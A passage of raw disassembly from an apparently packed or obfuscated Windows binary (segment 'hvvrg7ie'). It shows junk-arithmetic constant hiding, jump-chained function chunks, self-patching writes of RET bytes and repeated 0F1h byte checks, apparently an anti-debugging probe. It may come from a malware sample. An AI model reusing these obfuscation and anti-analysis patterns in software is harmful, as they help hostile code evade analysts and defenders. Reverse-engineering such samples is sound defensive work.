		or	eax, 0B76F38B1h

loc_4548B2:				; CODE XREF: hvvrg7ie:loc_44FF2Dj
		mov	eax, [ebp-8]
		push	eax
		jmp	loc_452E6F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_4548BB:				; CODE XREF: sub_450AA8-12E7Cj
		pop	esi
		jl	loc_4538CF
		mov	esi, ecx
		jmp	loc_43BE60
; END OF FUNCTION CHUNK	FOR sub_450AA8

; =============== S U B	R O U T	I N E =======================================



sub_4548C9	proc near		; CODE XREF: sub_43A839:loc_447A78p
					; sub_447610+11889j

; FUNCTION CHUNK AT 004495A6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045036F SIZE 0000001B BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	dword ptr [ebp-0Ch], 1

loc_4548D4:				; CODE XREF: sub_43B3BE+Aj
					; sub_43C8E0+7j
		push	0F7080822h
		pop	eax
		xor	eax, 0CEE62AD7h
		jmp	loc_4495A6
sub_4548C9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		add	ecx, edx
		jmp	sub_4468C2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_4548EC:				; CODE XREF: sub_446D8D-A9DFj
					; sub_446D8D:loc_443574j
		push	35AD5881h
		pop	eax
		xor	eax, 77040432h
		or	eax, 78E352BFh
		add	eax, 3264E87h
		add	eax, ebp
		add	eax, 81EE52B6h
		jmp	loc_444562
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
		push	19C3B359h
		pop	eax
		or	eax, ds:4000F2h
		sub	eax, 0E05BF4AEh
		add	eax, 0BA264683h
		jmp	loc_43E549
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45ADCB

loc_45492E:				; CODE XREF: sub_45ADCB:loc_43D703j
		xchg	ebp, [esp+8+var_8]
		push	offset sub_4554E8
		jmp	loc_43B23D
; END OF FUNCTION CHUNK	FOR sub_45ADCB

; =============== S U B	R O U T	I N E =======================================



sub_45493B	proc near		; CODE XREF: sub_414884+1Cp
					; sub_41BB83+161p ...

; FUNCTION CHUNK AT 0043CE68 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00441BCF SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00447788 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447994 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044ADF0 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004542BA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004542F6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455F7F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045952E SIZE 00000009 BYTES

		push	eax
		push	0A6E18E55h
		pop	eax
		and	eax, 92FDEA0Ch
		rol	eax, 0Ch
		cmp	eax, 1C233683h
		jmp	loc_4542BA
sub_45493B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4417B1

loc_454956:				; CODE XREF: sub_4417B1+10DBEj
		jg	loc_43BD3A
		shr	ecx, 4

loc_45495F:				; CODE XREF: sub_4417B1:loc_448460j
		mov	eax, 3CFDF720h
		call	sub_44059F
		jmp	loc_4418D7
; END OF FUNCTION CHUNK	FOR sub_4417B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B3F1

loc_45496E:				; CODE XREF: sub_44B3F1-78A3j
		jz	loc_44B205
		jmp	loc_458DC7
; END OF FUNCTION CHUNK	FOR sub_44B3F1
; ---------------------------------------------------------------------------
		push	eax
		call	sub_455AA0

loc_45497F:				; CODE XREF: hvvrg7ie:00445A88j
		jmp	loc_44E899
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A839

loc_454984:				; CODE XREF: sub_43A839-39j
		jge	loc_45B390
		adc	ecx, 0DFE56E6Ch
		jmp	loc_43CC4A
; END OF FUNCTION CHUNK	FOR sub_43A839
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_286. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_454996:				; CODE XREF: hvvrg7ie:004553C1j
		jmp	loc_4588B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E81

loc_45499B:				; CODE XREF: sub_454E81+13j
		jz	loc_45764C
; END OF FUNCTION CHUNK	FOR sub_454E81
; START	OF FUNCTION CHUNK FOR sub_4485A2

loc_4549A1:				; CODE XREF: sub_4485A2:loc_451C26j
		jmp	loc_44DCC9
; END OF FUNCTION CHUNK	FOR sub_4485A2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_4549A6:				; CODE XREF: sub_43B6A5-163j
		jns	loc_4560D6

loc_4549AC:				; CODE XREF: sub_43C0DE+14j
		jmp	loc_442C48
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------
		xchg	edi, ecx
		push	esi
		jmp	loc_4560D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_4549B9:				; CODE XREF: sub_45889B-67AFj
		jb	loc_44A9B1
		ror	ebp, 0Ah

loc_4549C2:				; CODE XREF: sub_45889B:loc_443B6Cj
					; hvvrg7ie:00447BF4j ...
		mov	esp, ebp
		xchg	edi, [esp+0]
		jmp	loc_44FAAB
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------

loc_4549CC:				; CODE XREF: hvvrg7ie:loc_4563B2j
		xor	ebp, 1B56EA6Ch
		xor	edx, ecx
		cmp	esi, 71751C49h
		jmp	loc_44D30B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_4549DF:				; CODE XREF: sub_440643:loc_43C33Dj
		js	loc_4506BE
; END OF FUNCTION CHUNK	FOR sub_440643
; START	OF FUNCTION CHUNK FOR sub_43A0C9

loc_4549E5:				; CODE XREF: sub_43A0C9+5j
		jmp	loc_4593E6
; END OF FUNCTION CHUNK	FOR sub_43A0C9
; ---------------------------------------------------------------------------
		mov	ecx, esi
		rol	ebp, 0Fh
		jmp	loc_44EB2D
; ---------------------------------------------------------------------------

loc_4549F4:				; DATA XREF: sub_4546E9:loc_4504CBo
		sub	al, 99h
		mov	edx, [ebp-4]
		call	sub_44D671
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_4549FE:				; CODE XREF: sub_448BC0:loc_43E5E7j
		jl	loc_458424
; END OF FUNCTION CHUNK	FOR sub_448BC0
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_454A04:				; CODE XREF: sub_44E3B3-836Dj
		jmp	loc_4449F2
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; ---------------------------------------------------------------------------

loc_454A09:				; CODE XREF: hvvrg7ie:00444CC3j
		jmp	loc_4417CB
; ---------------------------------------------------------------------------
		add	ebx, esi
		jl	loc_4577BF
		jmp	loc_43D439
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CA4B

loc_454A1B:				; CODE XREF: sub_44CA4B+CB91j
		jge	loc_4543DB

loc_454A21:				; CODE XREF: sub_458F53-994Aj
		jmp	loc_446D27
; END OF FUNCTION CHUNK	FOR sub_44CA4B
; ---------------------------------------------------------------------------
		mov	ebx, [ecx]
		test	edx, 0A52BD26h
		jmp	loc_43CBC3
; ---------------------------------------------------------------------------
		pushf
		jmp	sub_43B648
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440603

loc_454A39:				; CODE XREF: sub_440603+Bj
		pop	edx
		xor	edx, 0C3D74800h
		rol	edx, 16h
		add	edx, ds:4000F6h
		jnz	loc_4598AE

loc_454A4F:				; CODE XREF: sub_45AEC9-1264j
		jmp	loc_44FEA8
; END OF FUNCTION CHUNK	FOR sub_440603
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C354

loc_454A54:				; CODE XREF: sub_43C354+12718j
		jmp	loc_445148
; END OF FUNCTION CHUNK	FOR sub_43C354
; ---------------------------------------------------------------------------
		jnb	loc_444FBB
		adc	esi, ecx
		jmp	loc_4598AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45868E

loc_454A66:				; CODE XREF: sub_45868E+14j
		mov	edx, [ebp-14h]
		mov	[eax], edx
; END OF FUNCTION CHUNK	FOR sub_45868E
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_454A6B:				; CODE XREF: sub_44E3B3-8373j
		jno	loc_44CA06
		push	4FFF2F6Ch
		pop	eax
		rol	eax, 14h
		and	eax, 28BCAD00h
		jmp	loc_44324D
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_406. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_454A86:				; CODE XREF: sub_43D285+E92Cj
		jmp	loc_43C10E
; END OF FUNCTION CHUNK	FOR sub_43D285

; =============== S U B	R O U T	I N E =======================================



sub_454A8B	proc near		; CODE XREF: sub_456EC8j
					; DATA XREF: sub_456EAC+7o
		inc	dword ptr [ebp-1Ch]
		jmp	loc_44C95E
sub_454A8B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AF0A

loc_454A93:				; CODE XREF: sub_45AF0A-D83Fj
		inc	dword ptr [ebp-1Ch]
		jmp	loc_44F4C9
; END OF FUNCTION CHUNK	FOR sub_45AF0A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4563DC

loc_454A9B:				; CODE XREF: hvvrg7ie:0043BC31j
					; sub_4563DC+7j
		inc	dword ptr [ebp-18h]
		dec	dword ptr [ebp-24h]
		jmp	loc_4397D8
; END OF FUNCTION CHUNK	FOR sub_4563DC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446407

loc_454AA6:				; CODE XREF: sub_446407:loc_44AAB6j
		add	ebx, 253199C1h
		xchg	ebx, [esp-4+arg_0]
		jmp	loc_457593
; END OF FUNCTION CHUNK	FOR sub_446407
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_454AB4:				; CODE XREF: sub_44059F:loc_439CC9j
		not	esi
		jmp	loc_4532C2
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_454ABB:				; CODE XREF: sub_43D285+1688Aj
		adc	esi, 0C06C8443h
		jmp	loc_450B7E
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
		jbe	loc_44F998
		and	ecx, 0ACCCEEF4h
		jmp	sub_44D7C0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B8A5

loc_454AD7:				; CODE XREF: sub_43B8A5+29D8j
		jz	loc_451CDB
		push	ebp
		mov	eax, [ebp-20h]
		call	sub_43E854

loc_454AE6:				; CODE XREF: sub_43B3BE:loc_43E435j
		push	offset loc_453E2C
		jmp	nullsub_198
; END OF FUNCTION CHUNK	FOR sub_43B8A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F8F2

loc_454AF0:				; CODE XREF: sub_44F8F2-5C9Fj
		test	edi, 0DCDB8BE6h
		jmp	loc_43E892
; END OF FUNCTION CHUNK	FOR sub_44F8F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B29

loc_454AFB:				; CODE XREF: sub_444B29:loc_43F3FAj
		mov	edx, [edi]
		jmp	loc_44B09A
; END OF FUNCTION CHUNK	FOR sub_444B29
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CA70

loc_454B02:				; CODE XREF: sub_43CA70+1A3B2j
		mov	esi, edx
		xchg	esi, [esp+0]
		mov	edx, eax
		xchg	edx, [esp+0]
		jmp	loc_458660
; END OF FUNCTION CHUNK	FOR sub_43CA70
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450A7A

loc_454B11:				; CODE XREF: sub_450A7A-12BBCj
		test	eax, 0DAF43212h
		jmp	loc_455E1F
; END OF FUNCTION CHUNK	FOR sub_450A7A
; ---------------------------------------------------------------------------

loc_454B1C:				; DATA XREF: sub_4465A6+219o
		push	edi
		push	87B1611Eh
		pop	edi
		add	edi, 0D502595Ch
		or	edi, 0A82C0705h
		add	edi, 385F7C5h
		xchg	edi, [esp]
		jmp	loc_43B243
; ---------------------------------------------------------------------------
		mov	ds:dword_41D060, eax
		lea	eax, nullsub_19
		mov	byte ptr [eax],	0C3h
		jmp	loc_455A44
; ---------------------------------------------------------------------------

loc_454B51:				; CODE XREF: hvvrg7ie:00455BBDj
		mov	eax, [esp]
		push	eax
		mov	eax, edx
		jmp	loc_459164

; =============== S U B	R O U T	I N E =======================================



sub_454B5C	proc near		; CODE XREF: sub_44B1C6-B633p
					; hvvrg7ie:00446652j

; FUNCTION CHUNK AT 0044A9BE SIZE 00000019 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	edx
		push	0D171DA01h
		pop	edx
		or	edx, 16CC4CC1h
		jmp	loc_44A9BE
sub_454B5C	endp

; ---------------------------------------------------------------------------
		dw 0F385h
		dd 0FFA0B4E9h
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BB2

loc_454B79:				; CODE XREF: sub_448BB2+4j
		and	ecx, 10412682h
		and	edx, ecx
		rol	ebx, 16h

loc_454B84:				; CODE XREF: hvvrg7ie:loc_45093Cj
		add	ecx, 834E3B2Dh
		push	offset loc_44097D
		jmp	nullsub_521
; END OF FUNCTION CHUNK	FOR sub_448BB2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_454B94:				; CODE XREF: sub_4465A6:loc_450B74j
		rol	ecx, 1Eh
		test	ecx, 40000h

loc_454B9D:				; CODE XREF: hvvrg7ie:0045A6B8j
		jmp	loc_457B18
; END OF FUNCTION CHUNK	FOR sub_4465A6

; =============== S U B	R O U T	I N E =======================================



sub_454BA2	proc near		; CODE XREF: hvvrg7ie:0044903Dp
					; hvvrg7ie:00454EE0j

; FUNCTION CHUNK AT 00445068 SIZE 00000014 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	6EBFD47Dh
		pop	edx
		add	edx, 790C1E9Ah
		xor	edx, 589F9F85h
		or	edx, 7C268525h
		jmp	loc_445068
sub_454BA2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_454BC3:				; DATA XREF: sub_4576E4-18411o
		xchg	ebp, [esp]
		mov	eax, ebp
		pop	ebp
		jz	loc_449B03
		mov	eax, [esp]
		push	ecx
		mov	ecx, edx
		jmp	loc_4495DC
; ---------------------------------------------------------------------------
		jmp	ds:off_41D198
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B94B

loc_454BE0:				; CODE XREF: sub_45B94B+3j
		jmp	loc_44503C
; END OF FUNCTION CHUNK	FOR sub_45B94B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C072

loc_454BE5:				; CODE XREF: sub_44C072-5437j
		jmp	nullsub_199
; END OF FUNCTION CHUNK	FOR sub_44C072
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45471C

loc_454BEA:				; CODE XREF: sub_45471C-1122Ej
		jmp	sub_44DE0A
; END OF FUNCTION CHUNK	FOR sub_45471C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445DC4

loc_454BEF:				; CODE XREF: sub_445DC4+3EBEj
					; sub_445DC4+8C72j ...
		jb	loc_449C87
		pop	edx
		mov	eax, [esp+0]
		push	edi
		mov	edi, edx
		jmp	loc_448D72
; END OF FUNCTION CHUNK	FOR sub_445DC4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44955C

loc_454C01:				; CODE XREF: sub_44955C+104CDj
		mov	ebx, ebp
		jmp	loc_45B416
; END OF FUNCTION CHUNK	FOR sub_44955C
; ---------------------------------------------------------------------------

loc_454C08:				; CODE XREF: hvvrg7ie:00455C24j
		jnp	loc_453C14

; =============== S U B	R O U T	I N E =======================================



sub_454C0E	proc near		; CODE XREF: hvvrg7ie:00452EDBp

arg_0		= dword	ptr  4

		xchg	ebx, [esp+0]
		pop	ebx
		xchg	ebp, [esp-4+arg_0]
		mov	ebx, ebp
		pop	ebp
		lea	eax, sub_445CCD
		mov	byte ptr [eax],	0C3h
		jmp	sub_445CCD
sub_454C0E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A6E4

loc_454C26:				; CODE XREF: sub_45A6E4+Ej
		push	offset sub_457DFB
		jmp	loc_43A895
; END OF FUNCTION CHUNK	FOR sub_45A6E4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_454C30:				; CODE XREF: sub_44388C-4405j
		sub	ebx, ecx

loc_454C32:				; CODE XREF: sub_44388C-440Ej
		sub	eax, 0AE8270A2h
		or	eax, 40A192A5h
		add	eax, 783EF682h
		push	offset sub_454E81
		jmp	loc_45B1D6
; END OF FUNCTION CHUNK	FOR sub_44388C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_324. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_454C4F:				; CODE XREF: sub_4465A6+153E5j
		jmp	loc_43BCFB
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_454C54:				; CODE XREF: sub_43E063+1D7D1j
		jmp	loc_45B990
; END OF FUNCTION CHUNK	FOR sub_43E063
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B7CB

loc_454C59:				; CODE XREF: sub_44B7CB+D8D5j
		jmp	loc_44EB7E
; END OF FUNCTION CHUNK	FOR sub_44B7CB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450A7A

loc_454C5E:				; CODE XREF: sub_450A7A+11j
		jmp	loc_444696
; END OF FUNCTION CHUNK	FOR sub_450A7A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E8

loc_454C63:				; CODE XREF: sub_4554E8:loc_45A95Ej
		jz	loc_43B67C
		jmp	loc_452A0D
; END OF FUNCTION CHUNK	FOR sub_4554E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44346F

loc_454C6E:				; CODE XREF: sub_44346F+Cj
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44A0A6
		jmp	loc_44D2E1
; END OF FUNCTION CHUNK	FOR sub_44346F
; ---------------------------------------------------------------------------

loc_454C7E:				; CODE XREF: hvvrg7ie:loc_43DA99j
		or	edi, 99A67C91h
		add	edi, 465E5A00h
		xchg	edi, [esp]
		jmp	loc_439AF4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E8

loc_454C92:				; CODE XREF: sub_4554E8:loc_4556B7j
		jge	loc_44E250
		jbe	loc_44374A
		and	edx, 24D51701h
		or	esi, edi
		jmp	loc_44E250
; END OF FUNCTION CHUNK	FOR sub_4554E8
; ---------------------------------------------------------------------------
byte_454CAB	db 68h			; DATA XREF: sub_44C072-543Co
		dd 2A637453h, 4EC88158h, 81166696h, 952CBBF8h, 0EB96E963h
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D964

loc_454CC2:				; CODE XREF: sub_43D964:loc_459EEAj
		xchg	esi, [ebp+0]
		and	esi, 65A688ACh
		jno	loc_43D41C
		jmp	loc_439D6F
; END OF FUNCTION CHUNK	FOR sub_43D964
; ---------------------------------------------------------------------------

loc_454CD6:				; CODE XREF: hvvrg7ie:loc_45B4A7j
		call	sub_440D0C

loc_454CDB:				; CODE XREF: hvvrg7ie:00451A08j
		jmp	loc_4444D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B048

loc_454CE0:				; CODE XREF: sub_45B048-C2D5j
		jmp	loc_458AD8
; END OF FUNCTION CHUNK	FOR sub_45B048
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C290

loc_454CE5:				; CODE XREF: sub_43C290+F87Dj
		jmp	sub_440603
; END OF FUNCTION CHUNK	FOR sub_43C290
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E6D

loc_454CEA:				; CODE XREF: sub_451E6D-145C8j
		jnz	nullsub_298
		and	ebx, edx
		sub	edx, ecx
		push	0CD3938C4h

loc_454CF9:				; CODE XREF: sub_451E6D:loc_43F28Ej
		mov	eax, [ebp-0Ch]
		push	eax
		jmp	loc_441BE6
; END OF FUNCTION CHUNK	FOR sub_451E6D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D47A

loc_454D02:				; CODE XREF: sub_44D47A+D821j
		call	sub_44612F
		or	eax, eax
		jnz	loc_440860
		jmp	loc_442C9A
; END OF FUNCTION CHUNK	FOR sub_44D47A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4491A7

loc_454D14:				; CODE XREF: hvvrg7ie:00456A91j
					; hvvrg7ie:loc_45752Cj	...
		shr	esi, 15h
; END OF FUNCTION CHUNK	FOR sub_4491A7
; START	OF FUNCTION CHUNK FOR sub_44E533

loc_454D17:				; CODE XREF: sub_44E533+81DFj
		push	0F3C75184h
		test	edx, esi
		jmp	loc_4486FC
; END OF FUNCTION CHUNK	FOR sub_44E533

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_454D23	proc near		; DATA XREF: sub_448768:loc_4542A9o

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043AC81 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043EAF1 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044A179 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AD6B SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044E4BE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459879 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B06A SIZE 00000013 BYTES

		push	ebp
		mov	ebp, esp
		push	edx
		push	ecx
		pop	edx
		xchg	edx, [esp+4+var_4]
		mov	byte ptr [ebp+var_4+3],	0
		mov	eax, cs
		jmp	loc_43EAF1
sub_454D23	endp


; =============== S U B	R O U T	I N E =======================================



sub_454D37	proc near		; CODE XREF: sub_44736C-310Ap
					; hvvrg7ie:00454859j

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043EE9F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F52B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441338 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00444F47 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00459626 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0045A0D4 SIZE 00000011 BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	edx, 0AE60AE6Fh
		call	sub_45B3FF

loc_454D46:				; CODE XREF: hvvrg7ie:loc_44C32Fj
		pushf
		and	edx, 0A2482F43h
		jmp	loc_441338
sub_454D37	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_454D52	proc near		; CODE XREF: hvvrg7ie:0043DB9Bj
					; hvvrg7ie:0044D27Dp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00447495 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C381 SIZE 00000002 BYTES

		xchg	esi, [esp+0]
		pop	esi
		xchg	ebp, [esp-4+arg_0]
		push	2AA13B22h
		xchg	edx, [esp+0]
		jmp	loc_447495
sub_454D52	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B9BB

loc_454D66:				; CODE XREF: sub_45B9BB-FD0j
		xor	eax, esi
		push	edi

loc_454D69:				; CODE XREF: sub_45B9BB:loc_457E8Dj
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44ADDA
		jmp	loc_43D8AA
; END OF FUNCTION CHUNK	FOR sub_45B9BB
; ---------------------------------------------------------------------------

loc_454D7A:				; CODE XREF: hvvrg7ie:0045B457j
		jnb	loc_44425A
		shr	ebp, 5
		adc	edx, 7D83D2CDh
		sub	esi, 47DFAC3Ch
		popf
		push	ecx
		jmp	loc_44425A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AB99

loc_454D96:				; CODE XREF: sub_43AB99+2D36j
		jl	loc_459315
		sbb	ecx, edx
		ror	edi, 13h
		jmp	loc_43E1EE
; END OF FUNCTION CHUNK	FOR sub_43AB99
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4484E1

loc_454DA6:				; CODE XREF: sub_4484E1:loc_4484FFj
		add	ecx, ebp
		add	ecx, 1033EF81h
		mov	[ecx], eax
		pop	ecx
		cmp	dword ptr [ebp-4], 0
		jnz	loc_44E839
		jmp	loc_456D36
; END OF FUNCTION CHUNK	FOR sub_4484E1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E8C

loc_454DC0:				; CODE XREF: sub_446E8C:loc_43DE26j
		jz	loc_444BA3
		jmp	loc_455953
; END OF FUNCTION CHUNK	FOR sub_446E8C
; ---------------------------------------------------------------------------

loc_454DCB:				; CODE XREF: hvvrg7ie:0045A28Ej
		push	eax
		push	0A9F0EBAEh
		xchg	ebp, [esp]

loc_454DD4:				; CODE XREF: hvvrg7ie:004574E3j
		mov	eax, ebp
		pop	ebp
		sub	eax, 4717C525h
		and	eax, 0B1029957h
		jmp	loc_44495D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AE41

loc_454DE8:				; CODE XREF: sub_43AE41-1D4Ej
		cmp	eax, esi
		jmp	loc_4483B3
; END OF FUNCTION CHUNK	FOR sub_43AE41
; ---------------------------------------------------------------------------

loc_454DEF:				; DATA XREF: sub_45AAC8-3C55o
		add	eax, edi
		call	sub_4533F2
; START	OF FUNCTION CHUNK FOR sub_4403B6

loc_454DF6:				; CODE XREF: sub_4403B6+19772j
		jmp	loc_447F2F
; END OF FUNCTION CHUNK	FOR sub_4403B6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424A6

loc_454DFB:				; CODE XREF: sub_4424A6-946j
		jmp	nullsub_448
; END OF FUNCTION CHUNK	FOR sub_4424A6
; ---------------------------------------------------------------------------
		or	edx, 0C47976E2h
		push	ecx
		jmp	sub_44F793
; ---------------------------------------------------------------------------

loc_454E0C:				; CODE XREF: hvvrg7ie:00445A7Bj
		jnz	loc_43CE21

loc_454E12:				; CODE XREF: hvvrg7ie:00445A5Ej
		sub	eax, 0EE2E61F2h
		and	eax, 0F55B54C0h
		test	eax, 100h
		jmp	loc_448504
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4499A7

loc_454E29:				; CODE XREF: sub_4499A7-D3FCj
		push	edx
		push	7C100CBFh
		pop	edx
		and	edx, 5F379DABh
		or	edx, 57DE10Ah
		xor	edx, 86EBC7AAh
		jmp	loc_45723B
; END OF FUNCTION CHUNK	FOR sub_4499A7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_463. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C6D7

loc_454E48:				; CODE XREF: sub_44C6D7-76F7j
		jmp	loc_45B2B7
; END OF FUNCTION CHUNK	FOR sub_44C6D7
; ---------------------------------------------------------------------------
		pop	ebp
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426E2

loc_454E4F:				; CODE XREF: sub_4426E2-1F57j
		jmp	nullsub_201
; END OF FUNCTION CHUNK	FOR sub_4426E2

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_454E54	proc near		; CODE XREF: sub_43E063:loc_439119j
					; sub_43D824+4p ...

; FUNCTION CHUNK AT 004556F0 SIZE 0000000A BYTES

		push	eax
		mov	eax, ebp
		xchg	eax, [esp+0]
		mov	ebp, esp
		push	esi
		mov	esi, ecx
		jmp	loc_4556F0
sub_454E54	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455BE2

loc_454E64:				; CODE XREF: sub_455BE2+10j
		and	ebx, eax
		push	ecx
		push	3FFBB5Bh
		pop	ecx
		or	ecx, 16F2DF89h
		rol	ecx, 0Ch
		add	ecx, offset byte_46554B
		jmp	loc_439070
; END OF FUNCTION CHUNK	FOR sub_455BE2

; =============== S U B	R O U T	I N E =======================================



sub_454E81	proc near		; DATA XREF: sub_44388C+113B8o

; FUNCTION CHUNK AT 0045499B SIZE 00000006 BYTES

		add	eax, ebp
		add	eax, 1E1172CDh
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_457651
		jmp	loc_45499B
sub_454E81	endp

; ---------------------------------------------------------------------------

loc_454E99:				; CODE XREF: hvvrg7ie:00441433j
		jno	loc_44D4D8

; =============== S U B	R O U T	I N E =======================================



sub_454E9F	proc near		; CODE XREF: sub_43E128+3A86p

; FUNCTION CHUNK AT 00442AFD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443C06 SIZE 00000007 BYTES

		xchg	edi, [esp+0]
		pop	edi

loc_454EA3:				; CODE XREF: hvvrg7ie:00455A2Dj
